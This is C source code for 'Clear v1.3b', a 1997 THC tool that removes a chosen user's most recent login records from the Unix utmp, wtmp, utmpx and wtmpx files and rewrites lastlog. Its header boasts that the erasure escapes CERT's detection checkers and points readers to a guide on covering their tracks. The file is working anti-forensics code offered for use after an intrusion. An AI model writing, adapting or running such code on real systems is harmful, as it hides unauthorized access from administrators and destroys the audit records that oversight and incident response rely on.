/********************************************************************
 * Clear v1.3b (c) 1997 by van Hauser / [THC] - vh@campus.de        *
 *                                                                  *
 * CLEAR cleans all defined system logfiles from a user's login     *
 * data. (utmp, wtmp, utmpx, wtmpx and lastlog)                     *
 *                                                                  *
 * -> The deletion can't be detected like those done by zap, wipe,  *
 *    etc. CERT's check programs chkwtmp and chklastlog won't work! * 
 *                                                                  *
 * -> #undef the system logfiles which do not exist on your system  *
 *                                                                  *
 * -> Note that this version only deletes the newest entry of the   *
 *    user in the system logfilse.                                  *
 *    Use Clear v1.3a if you want to delete *all* user entries.     *
 *                                                                  *
 * Don't forget to check the logfiles generated by syslogd !        *
 * And read the article COVER-1.THC from the THC-Magazine #3 on     *
 * more information on how to cover your tracks.                    *
 * It can be found at ftp.giga.or.at /pub/hacker/THC thc-mag3.zip   *
 *                                                                  *
 * If you finally need a good acct handler too, get ah-1_0b.tgz,    *
 * also in the THC-Magazine #3 ...                                  *
 ********************************************************************/

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>

/* all systems support utmp and wtmp */
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
/* utmpx and wtmpx are present on Sys VR4 systems. solaris, irix */
 /* 
 #define WTMPX_NAME "/var/adm/wtmpx"
 #define UTMPX_NAME "/var/adm/utmpx"
 */
/* lastlog is present on linux, sunos, solaris, irix, ultrix
   osf, digital unix. Not on hpux and bsdi, freebsd and therelike. */
#define LASTLOG_NAME "/var/adm/lastlog"

#define TMP_NAME "/tmp/.XthcX.tmp"

#ifdef LASTLOG_NAME
#include <lastlog.h>
#endif
#ifdef WTMPX_NAME
#define TMPX
#include <utmpx.h>
#endif
#ifdef UTMPX_NAME
#ifndef WTMPX_NAME
#define TMPX
#include <utmpx.h>
#endif
#endif

#ifdef _PATH_UTMP
#undef UTMP_NAME
#define UTMP_NAME _PATH_UTMP
#endif
#ifdef _PATH_WTMP
#undef WTMP_NAME
#define WTMP_NAME _PATH_WTMP
#endif
#ifdef _PATH_LASTLOG
#undef LASTLOG_NAME
#define LASTLOG_NAME _PATH_LASTLOG
#endif

int f_in;
int f_out;
int g_in;
int g_out;

signed long found = 0;
#ifdef LASTLOG_NAME
struct lastlog oldll;
int check = 0;
#endif
    
void move_1(char *who, char fileout[100])
{    
    struct utmp utmp_ent;
    long pos = 0L;
 
    if ((f_out=open(TMP_NAME, O_RDONLY))>=0)
    {
        if ((g_out=open(fileout, O_WRONLY | O_TRUNC ))>=0)
        {
            while(pos != -1L)
            {
                lseek(f_out,(long) ( (long)pos * (long)(sizeof utmp_ent)), 0);
                if (read(f_out, &utmp_ent, sizeof (struct utmp)) <= 0)
		{
		    pos = -1L;
                } else {
                    if (strncmp(utmp_ent.ut_name,who,strlen(who)) != 0)
		    {
		        write (g_out, &utmp_ent, sizeof (utmp_ent));
		    } else {
			found--;
                        if (found)
                        {
                            write (g_out, &utmp_ent, sizeof (utmp_ent));
#ifdef LASTLOG_NAME
#ifndef TMPX
                            if ((found == 1) && (check))
                            {
                                oldll.ll_time = utmp_ent.ut_time;
                                strcpy(oldll.ll_line, utmp_ent.ut_line);
                                strcpy(oldll.ll_host, utmp_ent.ut_host);
                             }
#endif
#endif
			}
                    }
                    pos += 1L;
                }
	    }
	    close(f_out);
            close(g_out);
	} else {
	    printf ("Can't write %s\n", fileout);
            close(f_out);
	}
    } else
        fprintf(stderr,"Can't find tmp file (admin around?) %s\n", TMP_NAME);
}    
    
    
int kill_tmp(char *who, char file[100])
{
    struct utmp utmp_ent;
    long pos = 0L;
    found=0;

    if ((f_in=open(file,O_RDONLY))>=0) 
    {
        if ((g_in=open(TMP_NAME,O_WRONLY | O_CREAT | O_TRUNC, 0600))>=0)
        {
            while(pos != -1L) 
            {
                lseek(f_in,(long) ( pos * (long)(sizeof(struct utmp))), 0);
                if ( read(f_in, &utmp_ent, sizeof (struct utmp)) <= 0 ) 
                {
                    pos = -1L;
                } else {
                     write (g_in, &utmp_ent, sizeof (utmp_ent));
                     pos += 1L;
                     if (strncmp(utmp_ent.ut_name,who,strlen(who)) == 0)
  		         found++;
                }
            }
            close(f_in);
            close(g_in);
            return(0);
        } else {
            printf ("Can't write tmp file : %s\n", TMP_NAME);
            close(f_in);
            return(1);
        }
    } else { 
        fprintf(stderr,"Can't find %s\n", file);
        return(1);
    }
}

#ifdef TMPX
void move_2(char *who, char fileout[100])
{    
    struct utmpx utmp_ent;
    long pos = 0L;
 
    if ((f_out=open(TMP_NAME, O_RDONLY))>=0)
    {
        if ((g_out=open(fileout, O_WRONLY | O_TRUNC ))>=0)
        {
            while(pos != -1L)
            {
                lseek(f_out,(long) ( (long)pos * (long)(sizeof utmp_ent)), 0);
                if (read(f_out, &utmp_ent, sizeof (struct utmp)) <= 0)
		{
		    pos = -1L;
                } else {
                    if (strncmp(utmp_ent.ut_name,who,strlen(who)) != 0)
		    {
		        write (g_out, &utmp_ent, sizeof (utmp_ent));
		    } else {
			found--;
                        if (found)
                        {
                            write (g_out, &utmp_ent, sizeof (utmp_ent));
#ifdef LASTLOG_NAME
                            if ((found == 1) && (check))
                            {
                                 oldll.ll_time = utmp_ent.ut_xtime;
                                 strcpy(oldll.ll_line, utmp_ent.ut_line);
                                 strcpy(oldll.ll_host, utmp_ent.ut_host);
                            }
#endif
                        }
                    }
                    pos += 1L;
                }
	    }
	    close(f_out);
            close(g_out);
	} else {
	    printf ("Can't write %s\n", fileout);
            close(f_out);
	}
    } else
        fprintf(stderr,"Can't find tmp file (admin around?) %s\n", TMP_NAME);
}    

int kill_tmpx(char *who, char file[100])
{
    struct utmpx utmp_ent;
    long pos = 0L;
    found=0;
           
    if ((f_in=open(file,O_RDONLY))>=0)
    {
        if ((g_in=open(TMP_NAME,O_WRONLY | O_CREAT | O_TRUNC, 0600))>=0)
        {
            while(pos != -1L)
            {
                lseek(f_in,(long)( (sizeof(struct utmp)) * pos), 0);
                if (read (f_in, &utmp_ent, sizeof (struct utmp))<=0)
                {
                    pos = -1L;
                } else {
                     write (g_in, &utmp_ent, sizeof (utmp_ent));
                     pos += 1L;
                     if (strncmp(utmp_ent.ut_name,who,strlen(who)) == 0)
                         found++;
                }
            }
            close(f_in);
            close(g_in);
	    return(0);
        } else {
            printf ("Can't write tmp file : %s\n", TMP_NAME);
            close(f_in);
            return(1);
        }
    } else {
        fprintf(stderr,"Can't find %s\n", file);
        return(1);
   }
}
#endif

kill_lastlog(char *who)
{
    struct passwd *pwd;
    struct lastlog newll;
    if (!strlen(oldll.ll_line))
    {
        oldll.ll_time=0;
        strcpy(oldll.ll_line, "");
        strcpy(oldll.ll_host, "");
    }
 
    if ((pwd=getpwnam(who))!=NULL) 
    {
        if ((f_in=open(LASTLOG_NAME, O_RDWR)) >= 0) 
        {
            lseek(f_in, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            newll.ll_time=oldll.ll_time;
            strcpy(newll.ll_line, oldll.ll_line);
            strcpy(newll.ll_host, oldll.ll_host);
            write(f_in, (char *)&oldll, sizeof( oldll ));
            close(f_in);
        } else { 
            printf ("Can't find lastlog in %s\n", LASTLOG_NAME);
        }
    } else 
        fprintf(stderr," Can't find user %s in passwd\n",who);
}

 
main(int argc, char *argv[])
{
#ifndef TMP_NAME
    fprintf(stderr,"TMP_NAME not defined. Edit source and recompile ...\n");
    return(1);
#endif

    if (argc==2) {
    
#ifdef WTMP_NAME
	check=1;
	fprintf(stderr,"wtmp ... ");
        if (kill_tmp(argv[1], WTMP_NAME) == 0)
            move_1(argv[1], WTMP_NAME);
        check=0;
#endif
#ifdef WTMPX_NAME
	fprintf(stderr,"wtmpx ... ");
        if (kill_tmpx(argv[1], WTMPX_NAME) == 0)
            move_2(argv[1], WTMPX_NAME);
#endif
#ifdef UTMP_NAME
	fprintf(stderr,"utmp ... ");
        if (kill_tmp(argv[1], UTMP_NAME) == 0)
            move_1(argv[1], UTMP_NAME);        
#endif
#ifdef UTMPX_NAME
        fprintf(stderr,"utmpx ... ");
        if (kill_tmpx(argv[1], UTMPX_NAME) == 0)
            move_2(argv[1], UTMPX_NAME);
#endif
#ifdef LASTLOG_NAME
        if (argv[1] != "")
        {
            fprintf(stderr,"lastlog ... ");
            kill_lastlog(argv[1]);
        }
#endif
        if (unlink(TMP_NAME) < 0)
            fprintf(stderr,"Can't remove %s, do it by hand ... ",TMP_NAME);
        fprintf(stderr,"Done!\n");
        if (argv[1] != "")
            fprintf(stderr,"Last entry cleared from user %s\n",argv[1]);
    } else
        fprintf(stderr,"Usage : %s username\n",argv[0]);           
}
